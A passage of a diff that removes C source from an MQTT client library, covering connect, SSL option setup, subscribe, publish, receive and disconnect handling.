-		MQTTClient_waitfor(handle, CONNECT, &rc, millisecsTimeout - MQTTClient_elapsed(start));
-		Thread_lock_mutex(mqttclient_mutex);
-		if (rc != 1)
-		{
-			rc = SOCKET_ERROR;
-			goto exit;
-		}
-		if(!m->c->cleansession && m->c->session == NULL)
-			m->c->session = SSL_get1_session(m->c->net.ssl);
-		m->c->connect_state = 3; /* TCP connect completed, in which case send the MQTT connect packet */
-		if (MQTTPacket_send_connect(m->c, MQTTVersion) == SOCKET_ERROR)
-		{
-			rc = SOCKET_ERROR;
-			goto exit;
-		}
-	}
-#endif
-
-	if (m->c->connect_state == 3) /* MQTT connect sent - wait for CONNACK */
-	{
-		MQTTPacket* pack = NULL;
-
-		Thread_unlock_mutex(mqttclient_mutex);
-		pack = MQTTClient_waitfor(handle, CONNACK, &rc, millisecsTimeout - MQTTClient_elapsed(start));
-		Thread_lock_mutex(mqttclient_mutex);
-		if (pack == NULL)
-			rc = SOCKET_ERROR;
-		else
-		{
-			Connack* connack = (Connack*)pack;
-			Log(TRACE_PROTOCOL, 1, NULL, m->c->net.socket, m->c->clientID, connack->rc);
-			if ((rc = connack->rc) == MQTTCLIENT_SUCCESS)
-			{
-				m->c->connected = 1;
-				m->c->good = 1;
-				m->c->connect_state = 0;
-				if (MQTTVersion == 4)
-					sessionPresent = connack->flags.bits.sessionPresent;
-				if (m->c->cleansession)
-					rc = MQTTClient_cleanSession(m->c);
-				if (m->c->outboundMsgs->count > 0)
-				{
-					ListElement* outcurrent = NULL;
-
-					while (ListNextElement(m->c->outboundMsgs, &outcurrent))
-					{
-						Messages* m = (Messages*)(outcurrent->content);
-						m->lastTouch = 0;
-					}
-					MQTTProtocol_retry((time_t)0, 1, 1);
-					if (m->c->connected != 1)
-						rc = MQTTCLIENT_DISCONNECTED;
-				}
-			}
-			free(connack);
-			m->pack = NULL;
-		}
-	}
-exit:
-	if (rc == MQTTCLIENT_SUCCESS)
-	{
-		if (options->struct_version == 4) /* means we have to fill out return values */
-		{
-			options->returned.serverURI = serverURI;
-			options->returned.MQTTVersion = MQTTVersion;
-			options->returned.sessionPresent = sessionPresent;
-		}
-	}
-	else
-		MQTTClient_disconnect1(handle, 0, 0, (MQTTVersion == 3)); /* don't want to call connection lost */
-	FUNC_EXIT_RC(rc);
-  return rc;
-}
-
-static int retryLoopInterval = 5;
-
-static void setRetryLoopInterval(int keepalive)
-{
-	int proposed = keepalive / 10;
-
-	if (proposed < 1)
-		proposed = 1;
-	else if (proposed > 5)
-		proposed = 5;
-	if (proposed < retryLoopInterval)
-		retryLoopInterval = proposed;
-}
-
-
-static int MQTTClient_connectURI(MQTTClient handle, MQTTClient_connectOptions* options, const char* serverURI)
-{
-	MQTTClients* m = handle;
-	START_TIME_TYPE start;
-	long millisecsTimeout = 30000L;
-	int rc = SOCKET_ERROR;
-	int MQTTVersion = 0;
-
-	FUNC_ENTRY;
-	millisecsTimeout = options->connectTimeout * 1000;
-	start = MQTTClient_start_clock();
-
-	m->c->keepAliveInterval = options->keepAliveInterval;
-	setRetryLoopInterval(options->keepAliveInterval);
-	m->c->cleansession = options->cleansession;
-	m->c->maxInflightMessages = (options->reliable) ? 1 : 10;
-
-	if (m->c->will)
-	{
-		free(m->c->will->payload);
-		free(m->c->will->topic);
-		free(m->c->will);
-		m->c->will = NULL;
-	}
-
-	if (options->will && (options->will->struct_version == 0 || options->will->struct_version == 1))
-	{
-		const void* source = NULL;
-
-		m->c->will = malloc(sizeof(willMessages));
-		if (options->will->message || (options->will->struct_version == 1 && options->will->payload.data))
-		{
-			if (options->will->struct_version == 1 && options->will->payload.data)
-			{
-				m->c->will->payloadlen = options->will->payload.len;
-				source = options->will->payload.data;
-			}
-			else
-			{
-				m->c->will->payloadlen = strlen(options->will->message);
-				source = (void*)options->will->message;
-			}
-			m->c->will->payload = malloc(m->c->will->payloadlen);
-			memcpy(m->c->will->payload, source, m->c->will->payloadlen);
-		}
-		else
-		{
-			m->c->will->payload = NULL;
-			m->c->will->payloadlen = 0;
-		}
-		m->c->will->qos = options->will->qos;
-		m->c->will->retained = options->will->retained;
-		m->c->will->topic = MQTTStrdup(options->will->topicName);
-	}
-
-#if defined(OPENSSL)
-	if (m->c->sslopts)
-	{
-		if (m->c->sslopts->trustStore)
-			free((void*)m->c->sslopts->trustStore);
-		if (m->c->sslopts->keyStore)
-			free((void*)m->c->sslopts->keyStore);
-		if (m->c->sslopts->privateKey)
-			free((void*)m->c->sslopts->privateKey);
-		if (m->c->sslopts->privateKeyPassword)
-			free((void*)m->c->sslopts->privateKeyPassword);
-		if (m->c->sslopts->enabledCipherSuites)
-			free((void*)m->c->sslopts->enabledCipherSuites);
-		free(m->c->sslopts);
-		m->c->sslopts = NULL;
-	}
-
-	if (options->struct_version != 0 && options->ssl)
-	{
-		m->c->sslopts = malloc(sizeof(MQTTClient_SSLOptions));
-		memset(m->c->sslopts, '\0', sizeof(MQTTClient_SSLOptions));
-		m->c->sslopts->struct_version = options->ssl->struct_version;
-		if (options->ssl->trustStore)
-			m->c->sslopts->trustStore = MQTTStrdup(options->ssl->trustStore);
-		if (options->ssl->keyStore)
-			m->c->sslopts->keyStore = MQTTStrdup(options->ssl->keyStore);
-		if (options->ssl->privateKey)
-			m->c->sslopts->privateKey = MQTTStrdup(options->ssl->privateKey);
-		if (options->ssl->privateKeyPassword)
-			m->c->sslopts->privateKeyPassword = MQTTStrdup(options->ssl->privateKeyPassword);
-		if (options->ssl->enabledCipherSuites)
-			m->c->sslopts->enabledCipherSuites = MQTTStrdup(options->ssl->enabledCipherSuites);
-		m->c->sslopts->enableServerCertAuth = options->ssl->enableServerCertAuth;
-		if (m->c->sslopts->struct_version >= 1)
-			m->c->sslopts->sslVersion = options->ssl->sslVersion;
-	}
-#endif
-
-	m->c->username = options->username;
-	m->c->password = options->password;
-	if (options->password)
-		m->c->passwordlen = strlen(options->password);
-	else if (options->struct_version >= 5 && options->binarypwd.data)
-	{
-		m->c->password = options->binarypwd.data;
-		m->c->passwordlen = options->binarypwd.len;
-	}
-	m->c->retryInterval = options->retryInterval;
-
-	if (options->struct_version >= 3)
-		MQTTVersion = options->MQTTVersion;
-	else
-		MQTTVersion = MQTTVERSION_DEFAULT;
-
-	if (MQTTVersion == MQTTVERSION_DEFAULT)
-	{
-		if ((rc = MQTTClient_connectURIVersion(handle, options, serverURI, 4, start, millisecsTimeout)) != MQTTCLIENT_SUCCESS)
-			rc = MQTTClient_connectURIVersion(handle, options, serverURI, 3, start, millisecsTimeout);
-	}
-	else
-		rc = MQTTClient_connectURIVersion(handle, options, serverURI, MQTTVersion, start, millisecsTimeout);
-
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-int MQTTClient_connect(MQTTClient handle, MQTTClient_connectOptions* options)
-{
-	MQTTClients* m = handle;
-	int rc = SOCKET_ERROR;
-
-	FUNC_ENTRY;
-	Thread_lock_mutex(connect_mutex);
-	Thread_lock_mutex(mqttclient_mutex);
-
-	if (options == NULL)
-	{
-		rc = MQTTCLIENT_NULL_PARAMETER;
-		goto exit;
-	}
-
-	if (strncmp(options->struct_id, "MQTC", 4) != 0 || 	options->struct_version < 0 || options->struct_version > 5)
-	{
-		rc = MQTTCLIENT_BAD_STRUCTURE;
-		goto exit;
-	}
-
-	if (options->will) /* check validity of will options structure */
-	{
-		if (strncmp(options->will->struct_id, "MQTW", 4) != 0 || (options->will->struct_version != 0 && options->will->struct_version != 1))
-		{
-			rc = MQTTCLIENT_BAD_STRUCTURE;
-			goto exit;
-		}
-	}
-
-#if defined(OPENSSL)
-	if (options->struct_version != 0 && options->ssl) /* check validity of SSL options structure */
-	{
-		if (strncmp(options->ssl->struct_id, "MQTS", 4) != 0 || options->ssl->struct_version < 0 || options->ssl->struct_version > 1)
-		{
-			rc = MQTTCLIENT_BAD_STRUCTURE;
-			goto exit;
-		}
-	}
-#endif
-
-	if ((options->username && !UTF8_validateString(options->username)) ||
-		(options->password && !UTF8_validateString(options->password)))
-	{
-		rc = MQTTCLIENT_BAD_UTF8_STRING;
-		goto exit;
-	}
-
-	if (options->struct_version < 2 || options->serverURIcount == 0)
-		rc = MQTTClient_connectURI(handle, options, m->serverURI);
-	else
-	{
-		int i;
-
-		for (i = 0; i < options->serverURIcount; ++i)
-		{
-			char* serverURI = options->serverURIs[i];
-
-			if (strncmp(URI_TCP, serverURI, strlen(URI_TCP)) == 0)
-				serverURI += strlen(URI_TCP);
-#if defined(OPENSSL)
-			else if (strncmp(URI_SSL, serverURI, strlen(URI_SSL)) == 0)
-			{
-				serverURI += strlen(URI_SSL);
-				m->ssl = 1;
-			}
-#endif
-			if ((rc = MQTTClient_connectURI(handle, options, serverURI)) == MQTTCLIENT_SUCCESS)
-				break;
-		}
-	}
-
-exit:
-	if (m->c->will)
-	{
-		if (m->c->will->payload)
-			free(m->c->will->payload);
-		if (m->c->will->topic)
-			free(m->c->will->topic);
-		free(m->c->will);
-		m->c->will = NULL;
-	}
-	Thread_unlock_mutex(mqttclient_mutex);
-	Thread_unlock_mutex(connect_mutex);
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-/**
- * mqttclient_mutex must be locked when you call this function, if multi threaded
- */
-static int MQTTClient_disconnect1(MQTTClient handle, int timeout, int call_connection_lost, int stop)
-{
-	MQTTClients* m = handle;
-	START_TIME_TYPE start;
-	int rc = MQTTCLIENT_SUCCESS;
-	int was_connected = 0;
-
-	FUNC_ENTRY;
-	if (m == NULL || m->c == NULL)
-	{
-		rc = MQTTCLIENT_FAILURE;
-		goto exit;
-	}
-	if (m->c->connected == 0 && m->c->connect_state == 0)
-	{
-		rc = MQTTCLIENT_DISCONNECTED;
-		goto exit;
-	}
-	was_connected = m->c->connected; /* should be 1 */
-	if (m->c->connected != 0)
-	{
-		start = MQTTClient_start_clock();
-		m->c->connect_state = -2; /* indicate disconnecting */
-		while (m->c->inboundMsgs->count > 0 || m->c->outboundMsgs->count > 0)
-		{ /* wait for all inflight message flows to finish, up to timeout */
-			if (MQTTClient_elapsed(start) >= timeout)
-				break;
-			Thread_unlock_mutex(mqttclient_mutex);
-			MQTTClient_yield();
-			Thread_lock_mutex(mqttclient_mutex);
-		}
-	}
-
-	MQTTClient_closeSession(m->c);
-
-	while (Thread_check_sem(m->connect_sem))
-		Thread_wait_sem(m->connect_sem, 100);
-	while (Thread_check_sem(m->connack_sem))
-		Thread_wait_sem(m->connack_sem, 100);
-	while (Thread_check_sem(m->suback_sem))
-		Thread_wait_sem(m->suback_sem, 100);
-	while (Thread_check_sem(m->unsuback_sem))
-		Thread_wait_sem(m->unsuback_sem, 100);
-exit:
-	if (stop)
-		MQTTClient_stop();
-	if (call_connection_lost && m->cl && was_connected)
-	{
-		Log(TRACE_MIN, -1, "Calling connectionLost for client %s", m->c->clientID);
-		Thread_start(connectionLost_call, m);
-	}
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-/**
- * mqttclient_mutex must be locked when you call this function, if multi threaded
- */
-static int MQTTClient_disconnect_internal(MQTTClient handle, int timeout)
-{
-	return MQTTClient_disconnect1(handle, timeout, 1, 1);
-}
-
-
-/**
- * mqttclient_mutex must be locked when you call this function, if multi threaded
- */
-void MQTTProtocol_closeSession(Clients* c, int sendwill)
-{
-	MQTTClient_disconnect_internal((MQTTClient)c->context, 0);
-}
-
-
-int MQTTClient_disconnect(MQTTClient handle, int timeout)
-{
-	int rc = 0;
-
-	Thread_lock_mutex(mqttclient_mutex);
-	rc = MQTTClient_disconnect1(handle, timeout, 0, 1);
-	Thread_unlock_mutex(mqttclient_mutex);
-	return rc;
-}
-
-
-int MQTTClient_isConnected(MQTTClient handle)
-{
-	MQTTClients* m = handle;
-	int rc = 0;
-
-	FUNC_ENTRY;
-	Thread_lock_mutex(mqttclient_mutex);
-	if (m && m->c)
-		rc = m->c->connected;
-	Thread_unlock_mutex(mqttclient_mutex);
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-int MQTTClient_subscribeMany(MQTTClient handle, int count, char* const* topic, int* qos)
-{
-	MQTTClients* m = handle;
-	List* topics = NULL;
-	List* qoss = NULL;
-	int i = 0;
-	int rc = MQTTCLIENT_FAILURE;
-	int msgid = 0;
-
-	FUNC_ENTRY;
-	Thread_lock_mutex(subscribe_mutex);
-	Thread_lock_mutex(mqttclient_mutex);
-
-	if (m == NULL || m->c == NULL)
-	{
-		rc = MQTTCLIENT_FAILURE;
-		goto exit;
-	}
-	if (m->c->connected == 0)
-	{
-		rc = MQTTCLIENT_DISCONNECTED;
-		goto exit;
-	}
-	for (i = 0; i < count; i++)
-	{
-		if (!UTF8_validateString(topic[i]))
-		{
-			rc = MQTTCLIENT_BAD_UTF8_STRING;
-			goto exit;
-		}
-
-		if(qos[i] < 0 || qos[i] > 2)
-		{
-			rc = MQTTCLIENT_BAD_QOS;
-			goto exit;
-		}
-	}
-	if ((msgid = MQTTProtocol_assignMsgId(m->c)) == 0)
-	{
-		rc = MQTTCLIENT_MAX_MESSAGES_INFLIGHT;
-		goto exit;
-	}
-
-	topics = ListInitialize();
-	qoss = ListInitialize();
-	for (i = 0; i < count; i++)
-	{
-		ListAppend(topics, topic[i], strlen(topic[i]));
-		ListAppend(qoss, &qos[i], sizeof(int));
-	}
-
-	rc = MQTTProtocol_subscribe(m->c, topics, qoss, msgid);
-	ListFreeNoContent(topics);
-	ListFreeNoContent(qoss);
-
-	if (rc == TCPSOCKET_COMPLETE)
-	{
-		MQTTPacket* pack = NULL;
-
-		Thread_unlock_mutex(mqttclient_mutex);
-		pack = MQTTClient_waitfor(handle, SUBACK, &rc, 10000L);
-		Thread_lock_mutex(mqttclient_mutex);
-		if (pack != NULL)
-		{
-			Suback* sub = (Suback*)pack;
-			ListElement* current = NULL;
-			i = 0;
-			while (ListNextElement(sub->qoss, &current))
-			{
-				int* reqqos = (int*)(current->content);
-				qos[i++] = *reqqos;
-			}
-			rc = MQTTProtocol_handleSubacks(pack, m->c->net.socket);
-			m->pack = NULL;
-		}
-		else
-			rc = SOCKET_ERROR;
-	}
-
-	if (rc == SOCKET_ERROR)
-		MQTTClient_disconnect_internal(handle, 0);
-	else if (rc == TCPSOCKET_COMPLETE)
-		rc = MQTTCLIENT_SUCCESS;
-
-exit:
-	Thread_unlock_mutex(mqttclient_mutex);
-	Thread_unlock_mutex(subscribe_mutex);
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-int MQTTClient_subscribe(MQTTClient handle, const char* topic, int qos)
-{
-	int rc = 0;
-	char *const topics[] = {(char*)topic};
-
-	FUNC_ENTRY;
-	rc = MQTTClient_subscribeMany(handle, 1, topics, &qos);
-	if (qos == MQTT_BAD_SUBSCRIBE) /* addition for MQTT 3.1.1 - error code from subscribe */
-		rc = MQTT_BAD_SUBSCRIBE;
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-int MQTTClient_unsubscribeMany(MQTTClient handle, int count, char* const* topic)
-{
-	MQTTClients* m = handle;
-	List* topics = NULL;
-	int i = 0;
-	int rc = SOCKET_ERROR;
-	int msgid = 0;
-
-	FUNC_ENTRY;
-	Thread_lock_mutex(unsubscribe_mutex);
-	Thread_lock_mutex(mqttclient_mutex);
-
-	if (m == NULL || m->c == NULL)
-	{
-		rc = MQTTCLIENT_FAILURE;
-		goto exit;
-	}
-	if (m->c->connected == 0)
-	{
-		rc = MQTTCLIENT_DISCONNECTED;
-		goto exit;
-	}
-	for (i = 0; i < count; i++)
-	{
-		if (!UTF8_validateString(topic[i]))
-		{
-			rc = MQTTCLIENT_BAD_UTF8_STRING;
-			goto exit;
-		}
-	}
-	if ((msgid = MQTTProtocol_assignMsgId(m->c)) == 0)
-	{
-		rc = MQTTCLIENT_MAX_MESSAGES_INFLIGHT;
-		goto exit;
-	}
-
-	topics = ListInitialize();
-	for (i = 0; i < count; i++)
-		ListAppend(topics, topic[i], strlen(topic[i]));
-	rc = MQTTProtocol_unsubscribe(m->c, topics, msgid);
-	ListFreeNoContent(topics);
-
-	if (rc == TCPSOCKET_COMPLETE)
-	{
-		MQTTPacket* pack = NULL;
-
-		Thread_unlock_mutex(mqttclient_mutex);
-		pack = MQTTClient_waitfor(handle, UNSUBACK, &rc, 10000L);
-		Thread_lock_mutex(mqttclient_mutex);
-		if (pack != NULL)
-		{
-			rc = MQTTProtocol_handleUnsubacks(pack, m->c->net.socket);
-			m->pack = NULL;
-		}
-		else
-			rc = SOCKET_ERROR;
-	}
-
-	if (rc == SOCKET_ERROR)
-		MQTTClient_disconnect_internal(handle, 0);
-
-exit:
-	Thread_unlock_mutex(mqttclient_mutex);
-	Thread_unlock_mutex(unsubscribe_mutex);
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-int MQTTClient_unsubscribe(MQTTClient handle, const char* topic)
-{
-	int rc = 0;
-	char *const topics[] = {(char*)topic};
-	FUNC_ENTRY;
-	rc = MQTTClient_unsubscribeMany(handle, 1, topics);
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-int MQTTClient_publish(MQTTClient handle, const char* topicName, int payloadlen, void* payload,
-							 int qos, int retained, MQTTClient_deliveryToken* deliveryToken)
-{
-	int rc = MQTTCLIENT_SUCCESS;
-	MQTTClients* m = handle;
-	Messages* msg = NULL;
-	Publish* p = NULL;
-	int blocked = 0;
-	int msgid = 0;
-
-	FUNC_ENTRY;
-	Thread_lock_mutex(mqttclient_mutex);
-
-	if (m == NULL || m->c == NULL)
-		rc = MQTTCLIENT_FAILURE;
-	else if (m->c->connected == 0)
-		rc = MQTTCLIENT_DISCONNECTED;
-	else if (!UTF8_validateString(topicName))
-		rc = MQTTCLIENT_BAD_UTF8_STRING;
-	if (rc != MQTTCLIENT_SUCCESS)
-		goto exit;
-
-	/* If outbound queue is full, block until it is not */
-	while (m->c->outboundMsgs->count >= m->c->maxInflightMessages ||
-         Socket_noPendingWrites(m->c->net.socket) == 0) /* wait until the socket is free of large packets being written */
-	{
-		if (blocked == 0)
-		{
-			blocked = 1;
-			Log(TRACE_MIN, -1, "Blocking publish on queue full for client %s", m->c->clientID);
-		}
-		Thread_unlock_mutex(mqttclient_mutex);
-		MQTTClient_yield();
-		Thread_lock_mutex(mqttclient_mutex);
-		if (m->c->connected == 0)
-		{
-			rc = MQTTCLIENT_FAILURE;
-			goto exit;
-		}
-	}
-	if (blocked == 1)
-		Log(TRACE_MIN, -1, "Resuming publish now queue not full for client %s", m->c->clientID);
-	if (qos > 0 && (msgid = MQTTProtocol_assignMsgId(m->c)) == 0)
-	{	/* this should never happen as we've waited for spaces in the queue */
-		rc = MQTTCLIENT_MAX_MESSAGES_INFLIGHT;
-		goto exit;
-	}
-
-	p = malloc(sizeof(Publish));
-
-	p->payload = payload;
-	p->payloadlen = payloadlen;
-	p->topic = (char*)topicName;
-	p->msgId = msgid;
-
-	rc = MQTTProtocol_startPublish(m->c, p, qos, retained, &msg);
-
-	/* If the packet was partially written to the socket, wait for it to complete.
-	 * However, if the client is disconnected during this time and qos is not 0, still return success, as
-	 * the packet has already been written to persistence and assigned a message id so will
-	 * be sent when the client next connects.
-	 */
-	if (rc == TCPSOCKET_INTERRUPTED)
-	{
-		while (m->c->connected == 1 && SocketBuffer_getWrite(m->c->net.socket))
-		{
-			Thread_unlock_mutex(mqttclient_mutex);
-			MQTTClient_yield();
-			Thread_lock_mutex(mqttclient_mutex);
-		}
-		rc = (qos > 0 || m->c->connected == 1) ? MQTTCLIENT_SUCCESS : MQTTCLIENT_FAILURE;
-	}
-
-	if (deliveryToken && qos > 0)
-		*deliveryToken = msg->msgid;
-
-	free(p);
-
-	if (rc == SOCKET_ERROR)
-	{
-		MQTTClient_disconnect_internal(handle, 0);
-		/* Return success for qos > 0 as the send will be retried automatically */
-		rc = (qos > 0) ? MQTTCLIENT_SUCCESS : MQTTCLIENT_FAILURE;
-	}
-
-exit:
-	Thread_unlock_mutex(mqttclient_mutex);
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-
-int MQTTClient_publishMessage(MQTTClient handle, const char* topicName, MQTTClient_message* message,
-															 MQTTClient_deliveryToken* deliveryToken)
-{
-	int rc = MQTTCLIENT_SUCCESS;
-
-	FUNC_ENTRY;
-	if (message == NULL)
-	{
-		rc = MQTTCLIENT_NULL_PARAMETER;
-		goto exit;
-	}
-
-	if (strncmp(message->struct_id, "MQTM", 4) != 0 || message->struct_version != 0)
-	{
-		rc = MQTTCLIENT_BAD_STRUCTURE;
-		goto exit;
-	}
-
-	rc = MQTTClient_publish(handle, topicName, message->payloadlen, message->payload,
-								message->qos, message->retained, deliveryToken);
-exit:
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-static void MQTTClient_retry(void)
-{
-	static time_t last = 0L;
-	time_t now;
-
-	FUNC_ENTRY;
-	time(&(now));
-	if (difftime(now, last) > retryLoopInterval)
-	{
-		time(&(last));
-		MQTTProtocol_keepalive(now);
-		MQTTProtocol_retry(now, 1, 0);
-	}
-	else
-		MQTTProtocol_retry(now, 0, 0);
-	FUNC_EXIT;
-}
-
-
-static MQTTPacket* MQTTClient_cycle(int* sock, unsigned long timeout, int* rc)
-{
-	struct timeval tp = {0L, 0L};
-	static Ack ack;
-	MQTTPacket* pack = NULL;
-
-	FUNC_ENTRY;
-	if (timeout > 0L)
-	{
-		tp.tv_sec = timeout / 1000;
-		tp.tv_usec = (timeout % 1000) * 1000; /* this field is microseconds! */
-	}
-
-#if defined(OPENSSL)
-	if ((*sock = SSLSocket_getPendingRead()) == -1)
-	{
-		/* 0 from getReadySocket indicates no work to do, -1 == error, but can happen normally */
-#endif
-		Thread_lock_mutex(socket_mutex);
-		*sock = Socket_getReadySocket(0, &tp);
-		Thread_unlock_mutex(socket_mutex);
-#if defined(OPENSSL)
-	}
-#endif
-	Thread_lock_mutex(mqttclient_mutex);
-	if (*sock > 0)
-	{
-		MQTTClients* m = NULL;
-		if (ListFindItem(handles, sock, clientSockCompare) != NULL)
-			m = (MQTTClient)(handles->current->content);
-		if (m != NULL)
-		{
-			if (m->c->connect_state == 1 || m->c->connect_state == 2)
-				*rc = 0;  /* waiting for connect state to clear */
-			else
-			{
-				pack = MQTTPacket_Factory(&m->c->net, rc);
-				if (*rc == TCPSOCKET_INTERRUPTED)
-					*rc = 0;
-			}
-		}
-		if (pack)
-		{
-			int freed = 1;
-
-			/* Note that these handle... functions free the packet structure that they are dealing with */
-			if (pack->header.bits.type == PUBLISH)
-				*rc = MQTTProtocol_handlePublishes(pack, *sock);
-			else if (pack->header.bits.type == PUBACK || pack->header.bits.type == PUBCOMP)
-			{
-				int msgid;
-
-				ack = (pack->header.bits.type == PUBCOMP) ? *(Pubcomp*)pack : *(Puback*)pack;
-				msgid = ack.msgId;
-				*rc = (pack->header.bits.type == PUBCOMP) ?
-						MQTTProtocol_handlePubcomps(pack, *sock) : MQTTProtocol_handlePubacks(pack, *sock);
-				if (m && m->dc)
-				{
-					Log(TRACE_MIN, -1, "Calling deliveryComplete for client %s, msgid %d", m->c->clientID, msgid);
-					(*(m->dc))(m->context, msgid);
-				}
-			}
-			else if (pack->header.bits.type == PUBREC)
-				*rc = MQTTProtocol_handlePubrecs(pack, *sock);
-			else if (pack->header.bits.type == PUBREL)
-				*rc = MQTTProtocol_handlePubrels(pack, *sock);
-			else if (pack->header.bits.type == PINGRESP)
-				*rc = MQTTProtocol_handlePingresps(pack, *sock);
-			else
-				freed = 0;
-			if (freed)
-				pack = NULL;
-		}
-	}
-	MQTTClient_retry();
-	Thread_unlock_mutex(mqttclient_mutex);
-	FUNC_EXIT_RC(*rc);
-	return pack;
-}
-
-
-static MQTTPacket* MQTTClient_waitfor(MQTTClient handle, int packet_type, int* rc, long timeout)
-{
-	MQTTPacket* pack = NULL;
-	MQTTClients* m = handle;
-	START_TIME_TYPE start = MQTTClient_start_clock();
-
-	FUNC_ENTRY;
-	if (((MQTTClients*)handle) == NULL || timeout <= 0L)
-	{
-		*rc = MQTTCLIENT_FAILURE;
-		goto exit;
-	}
-
-	if (running)
-	{
-		if (packet_type == CONNECT)
-		{
-			if ((*rc = Thread_wait_sem(m->connect_sem, timeout)) == 0)
-				*rc = m->rc;
-		}
-		else if (packet_type == CONNACK)
-			*rc = Thread_wait_sem(m->connack_sem, timeout);
-		else if (packet_type == SUBACK)
-			*rc = Thread_wait_sem(m->suback_sem, timeout);
-		else if (packet_type == UNSUBACK)
-			*rc = Thread_wait_sem(m->unsuback_sem, timeout);
-		if (*rc == 0 && packet_type != CONNECT && m->pack == NULL)
-			Log(LOG_ERROR, -1, "waitfor unexpectedly is NULL for client %s, packet_type %d, timeout %ld", m->c->clientID, packet_type, timeout);
-		pack = m->pack;
-	}
-	else
-	{
-		*rc = TCPSOCKET_COMPLETE;
-		while (1)
-		{
-			int sock = -1;
-			pack = MQTTClient_cycle(&sock, 100L, rc);
-			if (sock == m->c->net.socket)
-			{
-				if (*rc == SOCKET_ERROR)
-					break;
-				if (pack && (pack->header.bits.type == packet_type))
-					break;
-				if (m->c->connect_state == 1)
-				{
-					int error;
-					socklen_t len = sizeof(error);
-
-					if ((*rc = getsockopt(m->c->net.socket, SOL_SOCKET, SO_ERROR, (char*)&error, &len)) == 0)
-						*rc = error;
-					break;
-				}
-#if defined(OPENSSL)
-				else if (m->c->connect_state == 2)
-				{
-					*rc = SSLSocket_connect(m->c->net.ssl, sock);
-					if (*rc == SSL_FATAL)
-						break;
-					else if (*rc == 1) /* rc == 1 means SSL connect has finished and succeeded */
-					{
-						if (!m->c->cleansession && m->c->session == NULL)
-							m->c->session = SSL_get1_session(m->c->net.ssl);
-						break;
-					}
-				}
-#endif
-				else if (m->c->connect_state == 3)
-				{
-					int error;
-					socklen_t len = sizeof(error);
-
-					if (getsockopt(m->c->net.socket, SOL_SOCKET, SO_ERROR, (char*)&error, &len) == 0)
-					{
-						if (error)
-						{
-							*rc = error;
-							break;
-						}
-					}
-				}
-			}
-			if (MQTTClient_elapsed(start) > timeout)
-			{
-				pack = NULL;
-				break;
-			}
-		}
-	}
-
-exit:
-	FUNC_EXIT_RC(*rc);
-	return pack;
-}
-
-
-int MQTTClient_receive(MQTTClient handle, char** topicName, int* topicLen, MQTTClient_message** message,
-											 unsigned long timeout)
-{
-	int rc = TCPSOCKET_COMPLETE;
-	START_TIME_TYPE start = MQTTClient_start_clock();
-	unsigned long elapsed = 0L;
-	MQTTClients* m = handle;
-
-	FUNC_ENTRY;
-	if (m == NULL || m->c == NULL
-			|| running) /* receive is not meant to be called in a multi-thread environment */
-	{
-		rc = MQTTCLIENT_FAILURE;
-		goto exit;
-	}
-	if (m->c->connected == 0)
-	{
-		rc = MQTTCLIENT_DISCONNECTED;
-		goto exit;
-	}
-
-	*topicName = NULL;
-	*message = NULL;
-
-	/* if there is already a message waiting, don't hang around but still do some packet handling */
-	if (m->c->messageQueue->count > 0)
-		timeout = 0L;
-
-	elapsed = MQTTClient_elapsed(start);
-	do
-	{
-		int sock = 0;
-		MQTTClient_cycle(&sock, (timeout > elapsed) ? timeout - elapsed : 0L, &rc);
-
-		if (rc == SOCKET_ERROR)
-		{
-			if (ListFindItem(handles, &sock, clientSockCompare) && 	/* find client corresponding to socket */
-			  (MQTTClient)(handles->current->content) == handle)
-				break; /* there was an error on the socket we are interested in */
-		}
-		elapsed = MQTTClient_elapsed(start);
-	}
-	while (elapsed < timeout && m->c->messageQueue->count == 0);
-
-	if (m->c->messageQueue->count > 0)
-		rc = MQTTClient_deliverMessage(rc, m, topicName, topicLen, message);
-
-	if (rc == SOCKET_ERROR)
-		MQTTClient_disconnect_internal(handle, 0);
-
-exit:
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-void MQTTClient_yield(void)
-{
-	START_TIME_TYPE start = MQTTClient_start_clock();
-	unsigned long elapsed = 0L;
-	unsigned long timeout = 100L;
-	int rc = 0;
-
-	FUNC_ENTRY;
-	if (running) /* yield is not meant to be called in a multi-thread environment */
-	{
-		MQTTClient_sleep(timeout);
-		goto exit;
-	}
-
-	elapsed = MQTTClient_elapsed(start);
-	do
-	{
-		int sock = -1;
-		MQTTClient_cycle(&sock, (timeout > elapsed) ? timeout - elapsed : 0L, &rc);
-		Thread_lock_mutex(mqttclient_mutex);
-		if (rc == SOCKET_ERROR && ListFindItem(handles, &sock, clientSockCompare))
-		{
-			MQTTClients* m = (MQTTClient)(handles->current->content);
-			if (m->c->connect_state != -2)
-				MQTTClient_disconnect_internal(m, 0);
-		}
-		Thread_unlock_mutex(mqttclient_mutex);
-		elapsed = MQTTClient_elapsed(start);
-	}
-	while (elapsed < timeout);
-exit:
-	FUNC_EXIT;
-}
-
-/*
-static int pubCompare(void* a, void* b)
-{
-	Messages* msg = (Messages*)a;
-	return msg->publish == (Publications*)b;
-}*/
-
-
-int MQTTClient_waitForCompletion(MQTTClient handle, MQTTClient_deliveryToken mdt, unsigned long timeout)
-{
-	int rc = MQTTCLIENT_FAILURE;
-	START_TIME_TYPE start = MQTTClient_start_clock();
-	unsigned long elapsed = 0L;
-	MQTTClients* m = handle;
-
-	FUNC_ENTRY;
-	Thread_lock_mutex(mqttclient_mutex);
-
-	if (m == NULL || m->c == NULL)
-	{
-		rc = MQTTCLIENT_FAILURE;
-		goto exit;
-	}
-
-	elapsed = MQTTClient_elapsed(start);
-	while (elapsed < timeout)
-	{
-		if (m->c->connected == 0)
-		{
-			rc = MQTTCLIENT_DISCONNECTED;
-			goto exit;
-		}
-		if (ListFindItem(m->c->outboundMsgs, &mdt, messageIDCompare) == NULL)
-		{
-			rc = MQTTCLIENT_SUCCESS; /* well we couldn't find it */
-			goto exit;
-		}
-		Thread_unlock_mutex(mqttclient_mutex);
-		MQTTClient_yield();
-		Thread_lock_mutex(mqttclient_mutex);
